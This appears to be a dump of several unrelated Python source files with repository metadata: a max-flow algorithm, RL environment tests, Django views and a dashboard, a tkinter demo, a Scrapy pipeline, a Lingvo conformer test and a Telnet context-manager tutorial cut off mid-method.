self.E[to].append(self.Edge(fr, 0, len(self.E[fr]) - 1))
def run(self, source, sink, INF=10 ** 9):
"""find max-flow"""
maxflow = 0
while True:
self.bfs(source)
if self.level[sink] < 0:
return maxflow
self.itr = [0] * self.V
while True:
flow = self.dfs(source, sink, INF)
if flow > 0:
maxflow += flow
else:
break
def dfs(self, vertex, sink, flow):
"""find augmenting path"""
if vertex == sink:
return flow
for i in range(self.itr[vertex], len(self.E[vertex])):
self.itr[vertex] = i
e = self.E[vertex][i]
if e.cap > 0 and self.level[vertex] < self.level[e.to]:
d = self.dfs(e.to, sink, min(flow, e.cap))
if d > 0:
e.cap -= d
self.E[e.to][e.rev].cap += d
return d
return 0
def bfs(self, start):
"""find shortest path from start"""
que = collections.deque()
self.level = [-1] * self.V
que.append(start)
self.level[start] = 0
while que:
fr = que.popleft()
for e in self.E[fr]:
if e.cap > 0 and self.level[e.to] < 0:
self.level[e.to] = self.level[fr] + 1
que.append(e.to)
| [
"premier3next@gmail.com"
] | premier3next@gmail.com |
b5f06531dbe3c04664346f6cfd8fbd90c85fa5b5 | 9adc810b07f7172a7d0341f0b38088b4f5829cf4 | /tests/test_continuous_memory_augmented.py | 5eb4373d630b344ea3e657bd6e5768e045be776a | [
"MIT"
] | permissive | Asap7772/railrl_evalsawyer | 7ee9358b5277b9ddf2468f0c6d28beb92a5a0879 | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | refs/heads/main | 2023-05-29T10:00:50.126508 | 2021-06-18T03:08:12 | 2021-06-18T03:08:12 | 375,810,557 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | import unittest
import numpy as np
from rlkit.envs.memory.continuous_memory_augmented import (
ContinuousMemoryAugmented,
)
from rlkit.envs.memory.one_char_memory import OneCharMemory
from rlkit.testing.np_test_case import NPTestCase
class TestContinuousMemoryAugmented(NPTestCase):
def test_dim_correct(self):
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
self.assertEqual(env.action_space.flat_dim, 16)
def test_memory_action_saved(self):
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
env.reset()
env_action = np.zeros(6)
env_action[0] = 1
memory_written = np.random.rand(10)
action = [env_action, memory_written]
_, saved_memory = env.step(action)[0]
self.assertNpArraysEqual(memory_written, saved_memory)
if __name__ == '__main__':
unittest.main()
| [
"alexanderkhazatsky@gmail.com"
] | alexanderkhazatsky@gmail.com |
e721b0da6badeaacbd866a2f0a8a7aaba7ede2c4 | 773300eda3f26141a8cbf8259688c15978e5fdff | /collect_data/collect_emb_AE.py | 8e26b6ed01d859faeec1ac580d59e392170302bb | [] | no_license | ver228/worm-ts-classification | 96601c0f579a4d8f110cb6307ff59f8eb7620657 | 6d4d6b6f04e05a93baea7a5a7550a7a180b60c94 | refs/heads/master | 2021-10-28T15:28:27.098510 | 2019-04-24T07:36:35 | 2019-04-24T07:36:35 | 179,681,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 15 13:04:37 2018
@author: avelinojaver
"""
from pathlib import Path
import sys
src_d = Path(__file__).resolve().parents[1]
sys.path.append(str(src_d))
from worm_ts_classification.path import _root_dirs
from embeddings_helper import calculate_embeddings
from collect_emb_CeNDR import get_video_info_from_files
import pandas as pd
import os
def get_video_info_from_csv_agg(root_dir):
csv_path = str(Path.home() / 'workspace/WormData/screenings/Serena_WT_Screening/metadata_aggregation_screening.csv')
bad_labels = ['NONE']
video_info = pd.read_csv(csv_path)
video_info['dirname'] = video_info['dirname'].str.replace('/Volumes/behavgenom_archive\$/Serena/AggregationScreening/MaskedVideos/', '')
video_info = video_info.rename(columns={'strain_name':'strain', 'dirname':'file_path'})
video_info = video_info[~video_info['strain'].isin(bad_labels)]
fnames = root_dir + '/' + video_info['file_path'] + '/'+ video_info['basename'].str.replace('.hdf5', '_featuresN.hdf5')
is_valid = [os.path.exists(x) for x in fnames.values]
video_info = video_info[is_valid]
fnames = [Path(x) for e, x in zip(is_valid,fnames.values) if e]
return video_info, fnames
#%%
if __name__ == '__main__':
p = 'osx' if sys.platform == 'darwin' else 'centos_oxford'
root = _root_dirs[p]
set_type = 'CeNDR'
emb_set = 'AE2DWithSkels32_emb32_20180620'
root_dir = root + 'experiments/autoencoders/embeddings/CeNDR_ROIs_embeddings/20180620_173601_AE2DWithSkels32_skel-1-1_adam_lr0.001_batch16'
video_info, fnames = get_video_info_from_files(root_dir, f_ext = '_embeddings.hdf5')
save_file = root + 'experiments/classify_strains/{}_{}.hdf5'.format(set_type, emb_set)
calculate_embeddings(video_info,
fnames,
emb_set,
save_file,
col_label = 'roi_index',
embeddings_field = '/embeddings')
| [
"ver228@gmail.com"
] | ver228@gmail.com |
042d8b627f884b675c421f5924b25125dbd9ba28 | 344e44fd1caa2976daa11429bf57a949e6b824de | /lesson4/Win_Entry.py | 51ebb606d841eb9531eb9097072c1f528a2afdec | [] | no_license | vincenttuan/ntnu_python | 621bc23c6b7443fde9d9975f6a98226ddec3c42a | e1361518ab69bf8064d38efccb743fcc9b4dd4b5 | refs/heads/master | 2020-12-15T06:23:27.338319 | 2020-02-05T07:37:09 | 2020-02-05T07:37:09 | 234,856,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import random
import tkinter
from tkinter import messagebox
def get():
messagebox.showinfo("Hello Python", entry.get())
def set():
entry.delete(0, tkinter.END)
entry.insert(0, str(random.randint(1, 100)))
win = tkinter.Tk()
entry = tkinter.Entry(win, justify=tkinter.CENTER)
entry.config(font=('Arial', 40))
entry.insert(0, "hello")
entry.insert("end", "world")
entry.insert(5, ", ")
entry.pack()
button1 = tkinter.Button(win, text="Get", command=get)
button1.config(font=('Arial', 30))
button1.pack(side=tkinter.LEFT)
button2 = tkinter.Button(win, text="Set", command=set)
button2.config(font=('Arial', 30))
button2.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"vincentjava@yahoo.com.tw"
] | vincentjava@yahoo.com.tw |
3e58c1bd8bb2ce83eff77c6b6415588b37ace5ee | 161dcb4b1f3939231728e91a8129a2571842d23a | /unit_12/mysite/page/views.py | b717f1ce9a72e4c7c54642a51138da7f81962296 | [] | no_license | bm1120836/21-python | 3162896e1b9e41d57c4249ea5f3bcaf06eef0361 | 8924f9b53e68b08f9203f48b215ea5b3a420d075 | refs/heads/master | 2023-05-03T16:11:42.864607 | 2015-10-01T13:26:29 | 2015-10-01T13:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request,'pages/index.html', {})
def about(request):
mydict = {'title': 'Over and over I keep going over the world we knew'}
return render(request,'pages/about.html', mydict) | [
"janusnic@gmail.com"
] | janusnic@gmail.com |
2702973ff7a17bed0d48b32a62ace7da4711edf1 | 5f957add3e3f7a1885d4f1b106de72e93c8fcb1a | /ExerciciosPython/ex104.py | 3553a22823ba1a045866075009e6c26bace8337e | [
"MIT"
] | permissive | mpatrickaires/curso-python | 6e32cf785a3bc0076bb3ea24cd6d896604f4e774 | aba023648527d53bfe18833b91210a7e528a84d7 | refs/heads/main | 2022-12-27T00:57:07.467940 | 2020-10-14T00:48:09 | 2020-10-14T00:48:09 | 302,203,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def leiaInt(msg):
num = str(input(msg))
while not num.strip('-').isnumeric():
print('\033[1;31mERRO! Digite um número válido.\033[m')
num = input(msg)
num = int(num)
return num
# Programa Principal
n = leiaInt('Digite um número: ')
print(f'Você acabou de digitar o número {n}')
| [
"mpatrickaires@gmail.com"
] | mpatrickaires@gmail.com |
2064b14b6a814eb78b1b5e02c449821f5678c3f3 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/adamant.py | 1fae335b579f8f57ee4132e01c1630fe476896ba | [] | no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('adamant', __name__, url_prefix='/adamant')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
| [
"sqlconsult@hotmail.com"
] | sqlconsult@hotmail.com |
e9f664051e1cd44334bed76437d2bc6d1b9406fb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/2c58ac18335d9ccde20b181d76eafa8246a3add2-<get_dict_of_struct>-bug.py | c1b04ce9a26065e77e20d7fb780cf6950f112efa | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,532 | py |
def get_dict_of_struct(connection, vm):
'\n Transform SDK Vm Struct type to Python dictionary.\n '
if (vm is None):
return dict()
vms_service = connection.system_service().vms_service()
clusters_service = connection.system_service().clusters_service()
vm_service = vms_service.vm_service(vm.id)
devices = vm_service.reported_devices_service().list()
tags = vm_service.tags_service().list()
stats = vm_service.statistics_service().list()
labels = vm_service.affinity_labels_service().list()
groups = clusters_service.cluster_service(vm.cluster.id).affinity_groups_service().list()
return {
'id': vm.id,
'name': vm.name,
'host': (connection.follow_link(vm.host).name if vm.host else None),
'cluster': connection.follow_link(vm.cluster).name,
'status': str(vm.status),
'description': vm.description,
'fqdn': vm.fqdn,
'os_type': vm.os.type,
'template': connection.follow_link(vm.template).name,
'tags': [tag.name for tag in tags],
'affinity_labels': [label.name for label in labels],
'affinity_groups': [group.name for group in groups if (vm.name in [vm.name for vm in connection.follow_link(group.vms)])],
'statistics': dict(((stat.name, stat.values[0].datum) for stat in stats)),
'devices': dict(((device.name, [ip.address for ip in device.ips]) for device in devices)),
'ansible_host': (devices[0].ips[0].address if (len(devices) > 0) else None),
}
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
ed6013412f56c3d8d36b040db1926b7dbe4df1ac | 48a647031af30b93b332001544b258a787542c6f | /venv/chapter_14/class_3.py | 2436a321ca8a0127db83bc6d111881405f3e1be4 | [] | no_license | Adminsys-debug/xdclass_python | 3d3f37f7812336aa79bf9dc0d990658c67156057 | c2e82b750c5337045b07c19a0c9ead5c3752b3a7 | refs/heads/master | 2022-05-20T07:10:33.396655 | 2020-04-18T05:40:48 | 2020-04-18T05:40:48 | 256,659,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/31 15:34
# @Author : mr.chen
# @File : class_3
# @Software: PyCharm
# @Email : 794281961@qq.com
# 多态特性和构造函数
class Person:
# 构造函数
def __init__(self, name, age, height):
print("这是一个初始化操作")
self.name = name
self.age = age
self.height = height
def introduce_self(self):
print("hello,my name is %s and my age is %d and i.m %d height" % (self.name, self.age, self.height))
person = Person("Admin_sys", 27, 172)
person2 = Person("Admin_sys", 28, 173)
person.introduce_self()
person2.introduce_self()
| [
"a794281961@126.com"
] | a794281961@126.com |
6dfc0b14ac75334fd342c8fa9823d30c170f81a5 | 30ab9750e6ca334941934d1727c85ad59e6b9c8a | /zentral/contrib/santa/api_urls.py | 93f78fcb7f41f3f7a75739e197ec40139f839f52 | [
"Apache-2.0"
] | permissive | ankurvaishley/zentral | 57e7961db65278a0e614975e484927f0391eeadd | a54769f18305c3fc71bae678ed823524aaa8bb06 | refs/heads/main | 2023-05-31T02:56:40.309854 | 2021-07-01T07:51:31 | 2021-07-01T14:15:34 | 382,346,360 | 1 | 0 | Apache-2.0 | 2021-07-02T12:55:47 | 2021-07-02T12:55:47 | null | UTF-8 | Python | false | false | 404 | py | from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
from .api_views import IngestFileInfo, RuleSetUpdate
app_name = "santa_api"
urlpatterns = [
url('^ingest/fileinfo/$', IngestFileInfo.as_view(), name="ingest_file_info"),
url('^rulesets/update/$', RuleSetUpdate.as_view(), name="ruleset_update"),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
d55042888f85b776d9c53eb7f35d5f535bf6f671 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_74/268.py | e90272ff021d33b8a2ee2f63dff93259a4e40e74 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | def f(l):
begin={'O':1,'B':1}
last=l[0][0]
lasttime=0
result=0
for k in l:
robot=k[0]
if robot==last:
lasttime+=1+abs(k[1]-begin[robot])
result+=1+abs(k[1]-begin[robot])
begin[robot]=k[1]
else:
temp=abs(k[1]-begin[robot])
temp=max(temp,lasttime)
lasttime=1+temp-lasttime
result+=lasttime
begin[robot]=k[1]
last=robot
return result
def main():
s=input()
T=int(s)
for i in range(T):
s=input()
s=s.split(' ')
k=int(s[0])
s=s[1:]
l=[(s[2*i],int(s[2*i+1])) for i in range(k)]
print('Case #{0}: {1}'.format(i+1,f(l)))
main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
51f28b71ea08ed3bbd585cf7d38c3bdd57d362b4 | f6f4c87a1f2e750530a7d691da43514d84f99f5c | /hw12/a/q3.py | 6a3fdd0a408784e1ef313b123ef255e9c6c38d7a | [] | no_license | sarthak77/Basics-of-ML-AI | e941c6653bca95278cc62ee7ba229e8eaf4e309b | cb2ba9d271da919846211cf8496e29aff6beaa46 | refs/heads/master | 2020-07-25T10:33:54.420972 | 2020-01-09T19:25:57 | 2020-01-09T19:25:57 | 208,257,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,108 | py | import numpy as np
import matplotlib.pyplot as plt
def read_data(filename):
data = []
with open(filename,"r") as f:
lines = f.readlines()
for line in lines:
row = line.split("\t")
row = np.array(row).astype('float64')
data.append(row)
norm_data = []
mean = np.mean(data, axis=0)
for row in data:
temp = []
for i in range(6):
temp.append(row[i]/mean[i])
norm_data.append(temp)
return norm_data
def MSE_Gradient(w,data):
neg_grad = np.zeros(6)
for i in range(len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
y = data[5]
neg_grad = ((np.dot(w,x) - y) * x)
return neg_grad
def MSE_Loss(w,data):
loss = 0
for i in range(len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
y = data[i][5]
loss += ((np.dot(w,x) - y)**2)
return loss/len(data)
# Normal GDE
def Normal_GDE(data):
print("Normal GDE")
alpha = 0.00005
iters = 0
w = np.zeros(6)
prev_loss = 10
loss = MSE_Loss(w,data)
while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
# loss is pretty less or loss doesn't change much
iters += 1
prev_loss = loss
print("ITERATION = ",iters,", Loss = ",loss)
gradient = MSE_Gradient(w,data)
w = w - alpha*gradient
loss = MSE_Loss(w,data)
print("FINAL W = ",w," AFTER ",iters," ITERATIONS ")
# Optimized Learning Rate GDE
def Optimized_Learning_GDE(data):
print("OPTIMIZED LEARNING RATE GDE")
iters = 0
w = np.zeros(6)
prev_loss = 10
loss = MSE_Loss(w,data)
while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
# loss is pretty less or loss doesn't change much
iters += 1
prev_loss = loss
print("ITERATION = ",iters,", Loss = ",loss)
gradient = MSE_Gradient(w,data)
hessian = np.zeros([6,6])
for i in range(0, len(data)):
x = data[i]
x[5] = 1
x = np.array(x)
hessian += np.outer(x,x)
alpha_opt = (np.linalg.norm(gradient)**2)/(np.dot(gradient,np.dot(hessian,gradient)))
w = w - alpha_opt*gradient
loss = MSE_Loss(w,data)
print("FINAL W = ",w,"\n AFTER ",iters," ITERATIONS AND LOSS = ",loss)
data = read_data("airfoil_self_noise.dat")
# Normal_GDE(data)
Optimized_Learning_GDE(data) | [
"sarthak.singhal@students.iiit.ac.in"
] | sarthak.singhal@students.iiit.ac.in |
16689823e89dd4a3b15cad04a6054513fc61b631 | 9cb0543499fd473a609b6cb19f0db921586f5b48 | /lingvo/core/conformer_layer_test.py | b2ded4a207307e78ff392a2aa6065a1f3785bc68 | [
"Apache-2.0"
] | permissive | Harshs27/lingvo | bbb852eb3cd69b64813268857d91571241b12a40 | bd396e651488b2e2c4a7416be077b4a0226c87c8 | refs/heads/master | 2022-12-01T05:43:24.300541 | 2020-08-11T00:16:33 | 2020-08-11T00:17:08 | 286,606,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,289 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conformer layers as in https://arxiv.org/abs/2005.08100."""
# Lint as: PY3
from absl.testing import parameterized
from lingvo import compat as tf
from lingvo.core import conformer_layer
from lingvo.core import test_utils
class LConvLayerTest(test_utils.TestCase, parameterized.TestCase):
def testBasic(self):
batch, seqlen, dim = 2, 16, 4
inputs = tf.zeros([batch, seqlen, dim])
paddings = tf.zeros([batch, seqlen])
p = conformer_layer.LConvLayer.CommonParams(input_dim=dim, kernel_size=3)
p.name = 'lconv_layer'
l = p.Instantiate()
outputs = l.FPropDefaultTheta(inputs, paddings)
with self.session() as sess:
tf.global_variables_initializer().run()
out_vals = sess.run(outputs)
print([x.shape for x in out_vals])
class ConformerLayerTest(test_utils.TestCase, parameterized.TestCase):
def testBasic(self):
batch, seqlen, dim, heads = 2, 32, 4, 2
context = 2
inputs = tf.zeros([batch, seqlen, dim])
paddings = tf.zeros([batch, seqlen])
p = conformer_layer.ConformerLayer.CommonParams(
input_dim=dim,
atten_num_heads=heads,
atten_left_context=context + 1,
atten_right_context=context,
kernel_size=3,
fflayer_hidden_dim=4 * dim)
p.name = 'conformer_layer'
l = p.Instantiate()
outputs = l.FPropDefaultTheta(inputs, paddings)
with self.session() as sess:
tf.global_variables_initializer().run()
out_vals = sess.run(outputs)
print([x.shape for x in out_vals])
if __name__ == '__main__':
tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
26d874b2ef1277e4f7bbc5a3c0743aa9e19204b1 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /acmicpc/3106_error.py | cb083621f22b76ceccfd3a96d9d3a794dbb5ccd7 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | class Employee:
def __init__(self, _id, _income, _boss):
self.id = _id
self.income = _income
self.boss = _boss
class EmployeeGroup:
def __init__(self, _income, _employee, _bosses):
self.income = _income
self.employee = _employee
self.bosses = _bosses
def raiseIncome(employee_group_mapping, newbie):
if employee_group_mapping[newbie.boss.id].employee.id == newbie.boss.id and employee_group_mapping[newbie.boss.id].income < newbie.income: # succeed
employee_group = employee_group_mapping[newbie.boss.id]
employee_group.employee = newbie
employee_group.income = newbie.income
employee_group.bosses.append(newbie.boss)
else:
employee_group = EmployeeGroup(newbie.income, newbie, [])
employee_group_mapping[newbie.id] = employee_group
boss = newbie.boss
while boss is not None:
if boss not in employee_group.bosses:
employee_group_of_boss = employee_group_mapping[boss.id]
if employee_group_of_boss.income < employee_group.income:
employee_group_mapping[boss.id] = employee_group
employee_group.bosses.append(boss)
if employee_group_of_boss.employee.id == boss.id:
for e in employee_group_of_boss.bosses:
employee_group_mapping[e.id] = employee_group
employee_group.bosses += employee_group_of_boss.bosses
employee_group_of_boss.bosses.clear()
else:
employee_group_of_boss.bosses.remove(boss)
boss = boss.boss
return len(employee_group.bosses)
n = int(input())
i = int(input())
employees = [Employee(0, i, None)]
employee_group_mapping = {0:EmployeeGroup(i, employees[0], [])}
for id in range(1, n + 1):
i, b = map(int, input().split())
newbie = Employee(id, i, employees[b])
employees.append(newbie)
print(raiseIncome(employee_group_mapping, newbie))
| [
"sunghyo.jung@navercorp.com"
] | sunghyo.jung@navercorp.com |
c7b4b3fd79a720c7e02837ac27eb2800a44b7f3b | 62587160029c7c79b5d11f16e8beae4afa1c4834 | /webpages/twittscrapper/twittscrapper/pipelines.py | c40b9ecfb6e783c3a0a00f5bcfd87a2b229e9d0b | [] | no_license | LukaszMalucha/Scrapy-Collection | b11dcf2c09f33d190e506559d978e4f3b77f9f5a | 586f23b90aa984c22ea8f84eba664db9649ed780 | refs/heads/master | 2022-12-14T15:06:00.868322 | 2021-07-27T12:09:07 | 2021-07-27T12:09:07 | 144,448,351 | 3 | 0 | null | 2022-11-22T03:16:19 | 2018-08-12T07:55:05 | Python | UTF-8 | Python | false | false | 294 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TwittscrapperPipeline(object):
def process_item(self, item, spider):
return item
| [
"lucasmalucha@gmail.com"
] | lucasmalucha@gmail.com |
855708304e8f445cffbbbc23fa6d1429ec435a31 | fc85a54686e13e598541df14c472e8aa744e6713 | /tests/modules/extra/redis/mother/redis_domain_event_bus_mother.py | a60fb245abf48a044f881e381f7c89f8d93d7a1d | [
"MIT"
] | permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 928 | py | from redis.client import Redis
from petisco.extra.redis import RedisDomainEventBus
from tests.modules.base.mothers.message_meta_mother import MessageMetaMother
from tests.modules.extra.rabbitmq.mother.defaults import (
DEFAULT_ORGANIZATION,
DEFAULT_SERVICE,
)
class RedisDomainEventBusMother:
@staticmethod
def default(redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
)
@staticmethod
def with_service(service: str, redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, service, redis_database=redis_database
)
@staticmethod
def with_info_id(redis_database: Redis):
return RedisDomainEventBus(
DEFAULT_ORGANIZATION, DEFAULT_SERVICE, redis_database=redis_database
).with_meta(MessageMetaMother.with_meta_with_info())
| [
"noreply@github.com"
] | alice-biometrics.noreply@github.com |
7cc33ebc7a5a6efaa96b3f5637c6c092cbb63f0e | 4e30c855c253cc1d972d29e83edb9d5ef662d30a | /djangox_project/dashboard.py | eb9198581b4738fb580239ff7a68d3b04ec30954 | [
"MIT"
] | permissive | rajeshr188/django-onex | 8b531fc2f519d004d1da64f87b10ffacbd0f2719 | 0a190ca9bcf96cf44f7773686205f2c1f83f3769 | refs/heads/master | 2023-08-21T22:36:43.898564 | 2023-08-15T12:08:24 | 2023-08-15T12:08:24 | 163,012,755 | 2 | 0 | NOASSERTION | 2023-07-22T09:47:28 | 2018-12-24T17:46:35 | Python | UTF-8 | Python | false | false | 1,948 | py | from controlcenter import Dashboard, widgets
from django.db.models import Count, Sum
from contact.models import Customer
from sales.models import Invoice, Month, Receipt
class InvList(widgets.ItemList):
model = Invoice
list_display = ("pk", "customer", "balance")
class Invoice_count(widgets.SingleBarChart):
# label and series
values_list = ("month", "count_items")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(count_items=Count("id"))
)
# limit_to = 10
class Invoice_cash_value(widgets.SingleBarChart):
# label and series
values_list = ("month", "total")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.filter(balancetype="Cash")
.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(total=Sum("balance"))
)
# limit_to = 10
def legend(self):
# Displays labels in legend
return [x for x, y in self.values]
class Invoice_metal_value(widgets.SingleBarChart):
# label and series
values_list = ("month", "total")
# Data source
# queryset = Invoice.objects.extra(select={'date': 'DATE(created)'},order_by=['date']).values('date').annotate(count_items=Count('id'))
queryset = (
Invoice.objects.filter(balancetype="Metal")
.annotate(month=Month("created"))
.values("month")
.order_by("month")
.annotate(total=Sum("balance"))
)
# limit_to = 10
class MyDash(Dashboard):
widgets = (InvList, Invoice_count, Invoice_cash_value, Invoice_metal_value)
| [
"rajeshrathodh@gmail.com"
] | rajeshrathodh@gmail.com |
8541223ee9f41ea6a340339066aea93077edc297 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.py | d7551b1104f4f2bde286e2ba13e3fff4fae60a31 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[249.348292,31.217889], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_163723.59+311304.4/sdB_sdssj_163723.59+311304.4_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
07ab7a01d4a5fca02f2117dc9fa9530abe06a1bb | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_sentinel_B.py | a41cfb9d61b9bf2318a0b766282b89ad303786f1 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 833 | py | import sys
def flip(inStr, end):
arr = [x for x in inStr]
for x in xrange(end+1):
arr[x] = '+' if arr[x] == '-' else '-'
return "".join(arr)
def processRecord(inStr):
n = 0
while '-' in inStr:
n = n+1
end = inStr.rfind('-')
# start = end
# while start >= 1 and arr[start-1] == '-':
# start = start -1
inStr = flip(inStr, end)
return n
def processLine(fp, x):
result = processRecord(fp.readline())
print 'Case #{}: {}'.format(x, result)
def main():
filename = sys.argv[1]
try:
fp = open(filename)
records = int(fp.readline())
for x in xrange(records):
processLine(fp, x+1)
fp.close()
except Exception as e:
print e
raise e
if __name__ == '__main__':
main()
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
fdb4b8beb6788367b69cf674f43dbed29e7f26ed | 0b5be4b9162c19cf0d98972e52ce80aa8af47f0a | /High_Level_Coding_python3/7/7_3.py | 00a2b2d5a943d5ec99617a57f6fa2a786190cb36 | [] | no_license | Air-Zhuang/Test35 | 374c974a2a7693fff21be81278c1bb59a050f7ee | d9f92b7a025c91b7503f02afc896ac769f818a84 | refs/heads/master | 2021-06-19T12:36:13.383878 | 2019-09-21T08:02:43 | 2019-09-21T08:02:43 | 147,629,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,833 | py | '''
实现类似with的让对象支持上下文管理
'''
'''
实现上下文管理协议,需定义实例的__enter__,__exit__
方法,他们分别在with开始和结束时被调用
'''
from sys import stdin, stdout
import getpass
import telnetlib
from collections import deque
class TelnetClient:
def __init__(self, host, port=23):
self.host = host
self.port = port
def __enter__(self):
self.tn = telnetlib.Telnet(self.host, self.port)
self.history = deque([])
return self #这里要返回值
def __exit__(self, exc_type, exc_value, exc_tb):
print('IN __exit__', exc_type, exc_value, exc_tb)
self.tn.close()
self.tn = None
with open('history.txt', 'a') as f:
f.writelines(self.history)
return True
def login(self):
# user
self.tn.read_until(b"login: ")
user = input("Enter your remote account: ")
self.tn.write(user.encode('utf8') + b"\n")
# password
self.tn.read_until(b"Password: ")
password = getpass.getpass()
self.tn.write(password.encode('utf8') + b"\n")
out = self.tn.read_until(b'$ ')
stdout.write(out.decode('utf8'))
def interact(self):
while True:
cmd = stdin.readline()
if not cmd:
